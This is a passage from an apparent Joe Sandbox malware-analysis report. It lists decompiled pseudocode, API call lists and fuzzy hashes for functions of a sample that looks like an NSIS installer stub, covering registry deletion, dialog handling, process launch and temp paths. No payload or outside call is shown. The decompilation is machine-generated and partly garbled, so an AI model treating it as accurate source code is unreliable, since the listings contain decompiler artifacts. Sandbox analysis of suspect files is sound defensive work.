                                                                                            						}
                                                                                            						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                            						if(_t28 != 0) {
                                                                                            							goto L8;
                                                                                            						}
                                                                                            						return _t28;
                                                                                            					}
                                                                                            					return  *_t27(_a4, _a8,  *0x423f50, 0);
                                                                                            				}
                                                                                            				return _t18;
                                                                                            			}








                                                                                            0x00402a49
                                                                                            0x00402a51
                                                                                            0x00402a79
                                                                                            0x00402a63
                                                                                            0x00402ab3
                                                                                            0x00402ab9
                                                                                            0x00000000
                                                                                            0x00402abb
                                                                                            0x00402a77
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402a77
                                                                                            0x00402a8e
                                                                                            0x00402a96
                                                                                            0x00402a9d
                                                                                            0x00402ac9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ad1
                                                                                            0x00402ad9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ad9
                                                                                            0x00000000
                                                                                            0x00402aac
                                                                                            0x00402ac0

                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1912718029-0
                                                                                            • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                                                                                            • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                                                                                            • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                                                                                            • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00401CC1(int __edx) {
                                                                                            				void* _t17;
                                                                                            				struct HINSTANCE__* _t21;
                                                                                            				struct HWND__* _t25;
                                                                                            				void* _t27;
                                                                                            
                                                                                            				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                                                            				GetClientRect(_t25, _t27 - 0x40);
                                                                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                                            				if(_t17 != _t21) {
                                                                                            					DeleteObject(_t17);
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                                                                                            				return 0;
                                                                                            			}







                                                                                            0x00401ccb
                                                                                            0x00401cd2
                                                                                            0x00401d01
                                                                                            0x00401d09
                                                                                            0x00401d10
                                                                                            0x00401d10
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00401CC5
                                                                                            • GetClientRect.USER32 ref: 00401CD2
                                                                                            • LoadImageA.USER32 ref: 00401CF3
                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                                                                                            • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                                                                                            • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                                                                                            • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 51%
                                                                                            			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                            				char _v36;
                                                                                            				char _v68;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t26;
                                                                                            				void* _t34;
                                                                                            				signed int _t36;
                                                                                            				signed int _t39;
                                                                                            				unsigned int _t46;
                                                                                            
                                                                                            				_t46 = _a12;
                                                                                            				_push(0x14);
                                                                                            				_pop(0);
                                                                                            				_t34 = 0xffffffdc;
                                                                                            				if(_t46 < 0x100000) {
                                                                                            					_push(0xa);
                                                                                            					_pop(0);
                                                                                            					_t34 = 0xffffffdd;
                                                                                            				}
                                                                                            				if(_t46 < 0x400) {
                                                                                            					_t34 = 0xffffffde;
                                                                                            				}
                                                                                            				if(_t46 < 0xffff3333) {
                                                                                            					_t39 = 0x14;
                                                                                            					asm("cdq");
                                                                                            					_t46 = _t46 + 1 / _t39;
                                                                                            				}
                                                                                            				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                                            				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                                                                                            				_t21 = _t46 & 0x00ffffff;
                                                                                            				_t36 = 0xa;
                                                                                            				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                                            				_push(_t46 >> 0);
                                                                                            				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                                                                                            				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                                                                                            				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                                                                                            			}













                                                                                            0x00404618
                                                                                            0x0040461c
                                                                                            0x00404624
                                                                                            0x00404627
                                                                                            0x00404628
                                                                                            0x0040462a
                                                                                            0x0040462c
                                                                                            0x0040462f
                                                                                            0x0040462f
                                                                                            0x00404636
                                                                                            0x0040463c
                                                                                            0x0040463c
                                                                                            0x00404643
                                                                                            0x0040464e
                                                                                            0x0040464f
                                                                                            0x00404652
                                                                                            0x00404652
                                                                                            0x0040465f
                                                                                            0x0040466a
                                                                                            0x0040466d
                                                                                            0x0040467f
                                                                                            0x00404686
                                                                                            0x00404687
                                                                                            0x00404696
                                                                                            0x004046a6
                                                                                            0x004046c2

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                                                                                            • wsprintfA.USER32 ref: 004046A6
                                                                                            • SetDlgItemTextA.USER32 ref: 004046B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                                                                                            • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                                                                                            • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                                                                                            • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 51%
                                                                                            			E00401BAD() {
                                                                                            				signed int _t28;
                                                                                            				CHAR* _t31;
                                                                                            				long _t32;
                                                                                            				int _t37;
                                                                                            				signed int _t38;
                                                                                            				int _t42;
                                                                                            				int _t48;
                                                                                            				struct HWND__* _t52;
                                                                                            				void* _t55;
                                                                                            
                                                                                            				 *(_t55 - 0x34) = E004029CB(3);
                                                                                            				 *(_t55 + 8) = E004029CB(4);
                                                                                            				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                            					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                                                                                            				}
                                                                                            				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                            				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                            					 *(_t55 + 8) = E004029E8(0x44);
                                                                                            				}
                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                            				_push(1);
                                                                                            				if(__eflags != 0) {
                                                                                            					_t50 = E004029E8();
                                                                                            					_t28 = E004029E8();
                                                                                            					asm("sbb ecx, ecx");
                                                                                            					asm("sbb eax, eax");
                                                                                            					_t31 =  ~( *_t27) & _t50;
                                                                                            					__eflags = _t31;
                                                                                            					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                                            					goto L10;
                                                                                            				} else {
                                                                                            					_t52 = E004029CB();
                                                                                            					_t37 = E004029CB();
                                                                                            					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                            					if(__eflags == 0) {
                                                                                            						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                                                            						L10:
                                                                                            						 *(_t55 - 8) = _t32;
                                                                                            					} else {
                                                                                            						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                            						asm("sbb eax, eax");
                                                                                            						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                            					}
                                                                                            				}
                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                            				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                            					_push( *(_t55 - 8));
                                                                                            					E004059E3();
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                                                                                            				return 0;
                                                                                            			}












                                                                                            0x00401bb6
                                                                                            0x00401bc2
                                                                                            0x00401bc5
                                                                                            0x00401bce
                                                                                            0x00401bce
                                                                                            0x00401bd1
                                                                                            0x00401bd5
                                                                                            0x00401bde
                                                                                            0x00401bde
                                                                                            0x00401be1
                                                                                            0x00401be5
                                                                                            0x00401be7
                                                                                            0x00401c34
                                                                                            0x00401c36
                                                                                            0x00401c3f
                                                                                            0x00401c47
                                                                                            0x00401c4a
                                                                                            0x00401c4a
                                                                                            0x00401c53
                                                                                            0x00000000
                                                                                            0x00401be9
                                                                                            0x00401bf0
                                                                                            0x00401bf2
                                                                                            0x00401bfa
                                                                                            0x00401bfd
                                                                                            0x00401c25
                                                                                            0x00401c59
                                                                                            0x00401c59
                                                                                            0x00401bff
                                                                                            0x00401c0d
                                                                                            0x00401c15
                                                                                            0x00401c18
                                                                                            0x00401c18
                                                                                            0x00401bfd
                                                                                            0x00401c5c
                                                                                            0x00401c5f
                                                                                            0x00401c65
                                                                                            0x00402825
                                                                                            0x00402825
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                                                                                            • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                                                                                            • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                                                                                            • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E004052E5(CHAR* _a4) {
                                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                                            				int _t7;
                                                                                            
                                                                                            				0x4224a0->cb = 0x44;
                                                                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                                                                                            				if(_t7 != 0) {
                                                                                            					CloseHandle(_v20.hThread);
                                                                                            					return _v20.hProcess;
                                                                                            				}
                                                                                            				return _t7;
                                                                                            			}





                                                                                            0x004052ee
                                                                                            0x0040530a
                                                                                            0x00405312
                                                                                            0x00405317
                                                                                            0x00000000
                                                                                            0x0040531d
                                                                                            0x00405321

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                                                                                            • CloseHandle.KERNEL32(?), ref: 00405317
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 004052F8
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                            • API String ID: 3712363035-1785902839
                                                                                            • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                                                                                            • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                                                                                            • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                                                                                            • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00405578(CHAR* _a4) {
                                                                                            				CHAR* _t7;
                                                                                            
                                                                                            				_t7 = _a4;
                                                                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                            					lstrcatA(_t7, 0x40900c);
                                                                                            				}
                                                                                            				return _t7;
                                                                                            			}




                                                                                            0x00405579
                                                                                            0x00405590
                                                                                            0x00405598
                                                                                            0x00405598
                                                                                            0x004055a0

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                                                                                            • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-3081826266
                                                                                            • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                            • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                                                                                            • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                            • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 85%
                                                                                            			E00401EC5(char __ebx, char* __edi, char* __esi) {
                                                                                            				char* _t18;
                                                                                            				int _t19;
                                                                                            				void* _t30;
                                                                                            
                                                                                            				_t18 = E004029E8(0xffffffee);
                                                                                            				 *(_t30 - 0x2c) = _t18;
                                                                                            				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                                                            				 *__esi = __ebx;
                                                                                            				 *(_t30 - 8) = _t19;
                                                                                            				 *__edi = __ebx;
                                                                                            				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                                                            				if(_t19 != __ebx) {
                                                                                            					__eax = GlobalAlloc(0x40, __eax);
                                                                                            					 *(__ebp + 8) = __eax;
                                                                                            					if(__eax != __ebx) {
                                                                                            						if(__eax != 0) {
                                                                                            							__ebp - 0x44 = __ebp - 0x34;
                                                                                            							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                                                                                            								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                                                                                            								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                                                                                            								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                                                            							}
                                                                                            						}
                                                                                            						_push( *(__ebp + 8));
                                                                                            						GlobalFree();
                                                                                            					}
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                                                                                            				return 0;
                                                                                            			}






                                                                                            0x00401ec7
                                                                                            0x00401ecf
                                                                                            0x00401ed4
                                                                                            0x00401ed9
                                                                                            0x00401edd
                                                                                            0x00401ee0
                                                                                            0x00401ee2
                                                                                            0x00401ee9
                                                                                            0x00401ef2
                                                                                            0x00401efa
                                                                                            0x00401efd
                                                                                            0x00401f12
                                                                                            0x00401f18
                                                                                            0x00401f2b
                                                                                            0x00401f34
                                                                                            0x00401f40
                                                                                            0x00401f45
                                                                                            0x00401f45
                                                                                            0x00401f2b
                                                                                            0x00401f48
                                                                                            0x00401b75
                                                                                            0x00401b75
                                                                                            0x00401efd
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                            • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                                                              • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1404258612-0
                                                                                            • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                                                                                            • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                                                                                            • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                                                                                            • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 67%
                                                                                            			E00401D1B() {
                                                                                            				void* __esi;
                                                                                            				int _t6;
                                                                                            				signed char _t11;
                                                                                            				struct HFONT__* _t14;
                                                                                            				void* _t18;
                                                                                            				void* _t24;
                                                                                            				void* _t26;
                                                                                            				void* _t28;
                                                                                            
                                                                                            				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                                                                                            				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                                                                                            				 *0x40af7c = E004029CB(3);
                                                                                            				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                                            				 *0x40af83 = 1;
                                                                                            				 *0x40af80 = _t11 & 0x00000001;
                                                                                            				 *0x40af81 = _t11 & 0x00000002;
                                                                                            				 *0x40af82 = _t11 & 0x00000004;
                                                                                            				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                                                                                            				_t14 = CreateFontIndirectA(0x40af6c);
                                                                                            				_push(_t14);
                                                                                            				_push(_t26);
                                                                                            				E004059E3();
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                                                                                            				return 0;
                                                                                            			}











                                                                                            0x00401d29
                                                                                            0x00401d42
                                                                                            0x00401d4c
                                                                                            0x00401d51
                                                                                            0x00401d5c
                                                                                            0x00401d63
                                                                                            0x00401d75
                                                                                            0x00401d7b
                                                                                            0x00401d80
                                                                                            0x00401d8a
                                                                                            0x004024aa
                                                                                            0x00401561
                                                                                            0x00402825
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401D22
                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                            • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirect
                                                                                            • String ID:
                                                                                            • API String ID: 3272661963-0
                                                                                            • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                                                                                            • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                                                                                            • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                                                                                            • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00403897(void* __ecx, void* __eflags) {
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed short _t6;
                                                                                            				intOrPtr _t11;
                                                                                            				signed int _t13;
                                                                                            				signed int _t16;
                                                                                            				signed short* _t18;
                                                                                            				signed int _t20;
                                                                                            				signed short* _t23;
                                                                                            				intOrPtr _t25;
                                                                                            				signed int _t26;
                                                                                            				intOrPtr* _t27;
                                                                                            
                                                                                            				_t24 = "1033";
                                                                                            				_t13 = 0xffff;
                                                                                            				_t6 = E004059FC(__ecx, "1033");
                                                                                            				while(1) {
                                                                                            					_t26 =  *0x423ee4;
                                                                                            					if(_t26 == 0) {
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					_t16 =  *( *0x423eb0 + 0x64);
                                                                                            					_t20 =  ~_t16;
                                                                                            					_t18 = _t16 * _t26 +  *0x423ee0;
                                                                                            					while(1) {
                                                                                            						_t18 = _t18 + _t20;
                                                                                            						_t26 = _t26 - 1;
                                                                                            						if((( *_t18 ^ _t6) & _t13) == 0) {
